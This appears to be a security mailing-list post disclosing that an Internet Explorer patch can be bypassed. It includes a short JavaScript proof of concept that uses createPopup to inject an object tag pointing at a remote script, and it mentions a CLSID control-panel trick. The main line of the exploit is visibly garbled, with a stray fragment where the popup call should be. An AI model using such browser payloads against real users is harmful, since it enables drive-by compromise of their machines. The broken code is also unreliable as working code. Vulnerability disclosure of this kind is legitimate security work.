Since the cat somehow got out of the bag, and more importantly, this is so blatantly obvious, herewith is the "Bad News": The patch for Drew's object data=funky.hta doesn't work: <script> var oPopup = window.createPopup(); function showPopup() { oPopup.document.body.innerHTML = "<object data=ouch.php>";,0,1,1,document.body); } showPopup() </script> Notes: 1. Disable Active Scripting 2. In case that does not work, uninstall Internet Explorer 3. 4. This was sent to the manufacturer quite some time prior to this going out. Surprisingly no immediate acknowledgement 5. This is so blatantly obvious, in particular because it is the coupling of two known issues[one current + one from 2002]: It is beyond comprehension why this was not checked from the outset as it is a known issue plus file://::{CLSID}in the control panel in the object tag still functions to date. 6. At this stage one must really question the compentency of this particular operation. This is a pathetic oversight. --